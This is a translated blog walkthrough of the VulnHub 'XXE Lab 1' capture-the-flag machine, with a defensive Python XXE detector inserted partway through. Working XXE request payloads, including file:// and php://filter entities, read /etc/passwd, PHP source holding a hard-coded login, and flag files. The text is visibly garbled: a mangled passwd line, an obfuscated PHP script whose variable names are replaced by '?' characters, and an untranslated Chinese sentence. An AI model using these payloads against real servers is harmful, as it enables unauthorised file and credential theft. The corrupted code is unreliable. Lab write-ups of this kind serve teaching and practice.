
[攻略鴨] XXE Lab 1 VulnHub target machine walkthrough

2023-01-06 11:06 Author: 攻略鴨

The content of this article is entirely fictional. 攻略鴨 on Bilibili asks for your follows and likes!

Target machine address:

$ sudo arp-scan -l
192.168.221.151

http://192.168.221.151/xxe/

External information gathering

Port scan

80/tcp   open  http   syn-ack ttl 64 Apache httpd 2.4.27 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/xxe/* /admin.php
5355/tcp open  llmnr  syn-ack ttl 1

Website information

A login form is visible; attempt a login and capture the request:

POST /xxe/xxe.php HTTP/1.1
Host: 192.168.221.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 95
Origin: http://192.168.221.151
Connection: close
Referer: http://192.168.221.151/xxe/

<?xml version="1.0" encoding="UTF-8"?><root><name>tester</name><password>test</password></root>

Modify the request body to test for XXE:

POST /xxe/xxe.php HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY tester SYSTEM "file:///etc/passwd">
]>
<root><name>&tester;</name><password>test</password></root>

Response:

root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[... part omitted ...]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
r00t:x:1000:1000:Administrator,,,:/home/r00t:/bin/bash

This confirms an XXE vulnerability: the server expands the external entity and returns the file contents in the response.
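As a defender-side addition (not part of the original walkthrough), here is a Python check that flags request bodies like the two above, namely a DOCTYPE, external entity declarations, php://filter wrappers and their expansion in element content, plus a parser that refuses such bodies before they reach an XML library; the sample bodies are constructed to mirror the lab's requests.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies modelled on the lab's login request (not captured traffic).
BENIGN_BODY = ('<?xml version="1.0" encoding="UTF-8"?>'
               '<root><name>tester</name><password>test</password></root>')
XXE_BODY = ('<?xml version="1.0" encoding="UTF-8"?>\n'
            '<!DOCTYPE r [\n<!ELEMENT r ANY >\n'
            '<!ENTITY tester SYSTEM "file:///etc/passwd">\n]>\n'
            '<root><name>&tester;</name><password>test</password></root>')
FILTER_BODY = XXE_BODY.replace(
    'file:///etc/passwd', 'php://filter/read=convert.base64-encode/resource=admin.php')

# <!ENTITY [%] name SYSTEM "uri"> or <!ENTITY [%] name PUBLIC "id" "uri">
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?(\w+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]+)"', re.I)
REF_RE = re.compile(r'&(\w+);')


def inspect_body(body: str) -> list[str]:
    """Return findings for a raw XML request body; an empty list means clean."""
    findings = []
    if re.search(r'<!DOCTYPE', body, re.I):
        findings.append('DOCTYPE declaration present')
    external = {}
    for m in ENTITY_RE.finditer(body):
        kind = 'parameter entity' if m.group(1) else 'external entity'
        name, uri = m.group(2), m.group(3)
        external[name] = uri
        findings.append(f'{kind} {name} -> {uri}')
        if uri.lower().startswith('php://filter'):
            findings.append(f'php://filter wrapper in {name}')
    # A reference to a declared external entity means its content is expanded.
    for ref in sorted(set(REF_RE.findall(body))):
        if ref in external:
            findings.append(f'&{ref}; expanded in content')
    return findings


def safe_parse(body: str) -> dict[str, str]:
    """Reject any body carrying a DOCTYPE or entity declaration, then parse it."""
    findings = inspect_body(body)
    if findings:
        raise ValueError('rejected XML body: ' + '; '.join(findings))
    root = ET.fromstring(body)
    return {child.tag: (child.text or '') for child in root}
```

Rejecting any DOCTYPE up front is the simplest robust mitigation; the findings list doubles as a detection signal for the web application log.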

XXE exploitation

Accessing http://192.168.221.151/admin.php directly returns 404.

Use the XXE vulnerability to read the PHP source (the php://filter wrapper Base64-encodes it so the PHP tags survive the XML parser):

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

After Base64-decoding the response, the main content is:

<?php
    $msg = '';
    if (isset($_POST['login']) && !empty($_POST['username'])
        && !empty($_POST['password'])) {

        // Hard-coded username; password is checked against a fixed MD5 hash
        if ($_POST['username'] == 'administhebest' &&
            md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
            $_SESSION['valid'] = true;
            $_SESSION['timeout'] = time();
            $_SESSION['username'] = 'administhebest';

            echo "You have entered valid use name and password <br />";
            $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
            echo $flag;
        } else {
            $msg = 'Maybe Later';
        }
    }
?>
</div> <!-- W00t/W00t -->

Collecting the information above:

Flag location: /flagmeout.php
username: administhebest
password: admin@123 (md5: e6e061838856bf47e1de730719fb2609)
W00t/W00t

Use XXE to read flagmeout.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">

返回值Base64解碼后為:

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

The comment indicates that the flag location is hidden in the 32-character string JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5. Base32-decoding it gives L2V0Yy8uZmxhZy5waHA=, and Base64-decoding that gives /etc/.flag.php.

Use XXE to read /etc/.flag.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">

The response is a Base64-encoded blob; decoding it gives:

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$à=+_;$á=$?=$?=$?=$?=$è=$é=$ê=$?=++$á[];$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$è++;$è++;$è++;$è++;$è++;$é++;$é++;$é++;$é++;$é++;$é++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$__('$_="'.$___.$á.$?.$?.$___.$á.$à.$á.$___.$á.$à.$è.$___.$á.$à.$?.$___.$á.$?.$?.$___.$á.$?.$à.$___.$á.$é.$?.$___.$á.$é.$à.$___.$á.$é.$à.$___.$á.$?.$?.$___.$á.$?.$é.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$?.$é.$___.$á.$?.$?.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$é.$á.$___.$á.$é.$?.'"');$__($_);

Prepend <?php to the script and run it with PHP to obtain the flag: SAFCSP{xxe_is_so_easy}
